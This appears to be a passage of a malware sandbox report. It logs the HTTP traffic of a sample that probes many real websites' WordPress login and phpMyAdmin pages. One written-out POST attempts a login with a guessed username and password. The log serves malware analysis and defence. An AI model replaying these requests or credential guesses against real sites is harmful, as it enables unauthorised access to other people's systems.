                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 32 32 32 32 32 32 32 32 32 32 32 32 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 36 36 36 36 36 36 36 36 36 36 36 37 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 38 38 38 38 38 38 38 38 38 38 38 39 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ntent h1{font-size:40px;font-size:2.2222222222222rem;line-height:1.4em;}h2,.entry-content h2{font-size:30px;font-size:1.6666666666667rem;line-height:1.25em;}h3,.entry-content h3{font-size:25px;font-size:1.3888888888889rem;line-height:1.2em;}h4,.entry-cont
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 2e 35 65 6d 20 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 61 72 74 5f 69 74 65 6d 2e 65 64 64 5f 63 68 65 63 6b 6f 75 74 20 7b 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 31 2e 35 65 6d 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 3e 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 5f 5f 65 6d 70 74 79 2d 6d 65 73 73 61 67 65
                                                                                                                                                                                                    Data Ascii: .5em 1.5em;margin: 0;text-align: center;}.astra-cart-drawer .astra-cart-drawer-content .cart_item.edd_checkout {padding: 1em 1.5em 0;text-align: center;margin-top: 0;}.astra-cart-drawer .widget_shopping_cart_content > .woocommerce-mini-cart__empty-message
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    297192.168.2.46305045.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC382OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=jesjnggp6vjls65p7b8o9k2csb
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 158
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC158OUTData Raw: 6c 6f 67 3d 63 6f 6e 74 61 63 74 75 73 26 70 77 64 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 77 70 73 65 63 5f 63 61 70 74 63 68 61 5f 61 6e 73 77 65 72 3d 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=contactus&pwd=Welcome2016%24&wpsec_captcha_answer=&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fengel-firm.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC773INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC7940INData Raw: 31 65 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1efc<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1604INData Raw: 36 33 64 0d 0a 72 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 33 2e 34 27 20 69 64 3d 27 75 6e 64 65 72 73 63 6f 72 65 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70
                                                                                                                                                                                                    Data Ascii: 63dre.min.js?ver=1.13.4' id='underscore-js'></script><script type='text/javascript' id='wp-util-js-extra'>/* <![CDATA[ */var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/* ... */</script><script type='text/javascript' src='http
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    298192.168.2.46290915.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    299192.168.2.462924194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC98INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Foundcontent-length: 0location: /cache-control: no-cacheconnection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    300192.168.2.462806202.226.37.1584436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC178OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: daisyokogyo.co.jp
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC165INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: closeLocation: /


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    301192.168.2.462923213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC529INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel="ht


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    302192.168.2.46291578.128.62.1384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC988INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6e 49 31 5a 31 42 59 52 31 6f 34 62 58 68 51 61 46 6c 70 64 31 4e 4d 53 45 68 5a 64 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 47 56 78 51 6c 42 54 62 45 34 32 62 56 42 69 56 48 46 32 61 48 70 46 63 6c 4e 73 52 6b 30 78 4d 32 56 6f 65 54 51 77 63 56 77 76 55 48 64 32 55 6d 70 4f 57 57 5a 79 64 31 56 42 4d 47 49 33 65
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6InI1Z1BYR1o4bXhQaFlpd1NMSEhZdUE9PSIsInZhbHVlIjoiZGVxQlBTbE42bVBiVHF2aHpFclNsRk0xM2VoeTQwcVwvUHd2UmpOWWZyd1VBMGI3e
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 68 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20
